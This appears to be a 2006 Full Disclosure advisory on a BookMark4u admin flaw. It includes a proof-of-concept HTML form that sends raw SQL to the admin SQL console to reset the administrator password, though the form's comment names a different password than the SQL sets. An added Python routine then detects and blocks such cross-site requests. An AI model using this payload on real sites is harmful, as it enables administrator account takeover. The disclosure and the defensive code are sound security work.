Full Disclosure mailing list archives
Sql Injection in BookMark4u
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail com>
Date: Thu, 20 Apr 2006 18:46:43 +0200
site: http://bookmark4u.sourceforge.net/

Hello, I found a vulnerability in BookMark4u that you can use to make SQL injections... the following PoC changes the admin password:

[code]
<form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php' method='post'>
<tr><td align='center'>
<input type='hidden' name='sqlcmd' value="# add a administrator (initial password is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE user='admin';">
<input type='hidden' name='mode' value='sqlexec'>
<input type='submit' value="Execute Above (administrator's account)">
</td></tr>
</form></table>
<br><a href='javascript:document.location.reload();'>And Reload this page</a>.</body></html>
[/code]

MoHaJaLi
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
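The PoC above is a form that anyone can host elsewhere and have a logged-in administrator submit to the `mode=sqlexec` handler of `admin/config.php`. The following server-side vetting routine is an added example (not BookMark4u's own code): it rejects cross-site and token-less submissions, splits the `sqlcmd` field the way the PoC writes it (`%NL%` as newline, `#` comment lines) so the statements can be logged, and flags statements that write to `bk4u_passwd`. `TRUSTED_ORIGIN`, `SQLEXEC_PATH`, the `csrf_token` form field, the `Request` record and the sample request are assumptions.

```python
import re
import secrets
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

# Assumed deployment values (not from the advisory): origin serving the admin UI,
# path of the page whose mode=sqlexec handler runs raw SQL as the administrator.
TRUSTED_ORIGIN = "https://bookmarks.example.internal"
SQLEXEC_PATH = "/admin/config.php"
PASSWD_TABLE = "bk4u_passwd"  # table the advisory's PoC rewrites

@dataclass
class Request:
    path: str
    headers: dict
    body: str                # raw application/x-www-form-urlencoded POST body
    session_token: str = ""  # anti-CSRF token the server stored for this session

def split_sqlcmd(sqlcmd: str) -> list[str]:
    """Normalise the sqlcmd field as the PoC writes it (%NL% as newline,
    '#' comment lines) and return the individual SQL statements."""
    text = sqlcmd.replace("%NL%", "\n")
    kept = [ln for ln in text.splitlines() if not ln.lstrip().startswith("#")]
    return [s.strip() for s in "\n".join(kept).split(";") if s.strip()]

def touches_passwd_table(statements: list[str]) -> bool:
    """True if any statement writes to the credential table (worth an alert)."""
    pat = re.compile(rf"\b(update|insert\s+into|delete\s+from)\s+{PASSWD_TABLE}\b", re.I)
    return any(pat.search(s) for s in statements)

def vet_sqlexec(req: Request) -> str:
    """'ignore' for anything but the SQL console, 'allow' for a same-origin
    request carrying the session's CSRF token, otherwise 'block: <reason>'."""
    form = parse_qs(req.body)
    if req.path != SQLEXEC_PATH or form.get("mode", [""])[0] != "sqlexec":
        return "ignore"
    src = urlparse(req.headers.get("Origin") or req.headers.get("Referer") or "")
    if f"{src.scheme}://{src.netloc}" != TRUSTED_ORIGIN:
        return f"block: cross-site sqlexec from {src.netloc or 'unknown origin'}"
    token = form.get("csrf_token", [""])[0]
    if not token or not secrets.compare_digest(token, req.session_token):
        return "block: missing or invalid csrf token"
    return "allow"

# Constructed request shaped like the advisory's form, submitted from another site.
POC_BODY = ("sqlcmd=%23+add+a+administrator+%28initial+password+is+%27test%27%29+%25NL%25"
            "UPDATE+bk4u_passwd+SET+passwd%3DPASSWORD%28%27asdfg%27%29+WHERE+user%3D%27admin%27%3B"
            "&mode=sqlexec")
POC_REQUEST = Request(SQLEXEC_PATH, {"Referer": "http://attacker.example/poc.html"}, POC_BODY, "s3cr3t")
```

`vet_sqlexec(POC_REQUEST)` returns a cross-site block verdict; the same body sent from `TRUSTED_ORIGIN` with a valid `csrf_token` is allowed, and `touches_passwd_table(split_sqlcmd(...))` on its `sqlcmd` is what an audit log should alert on.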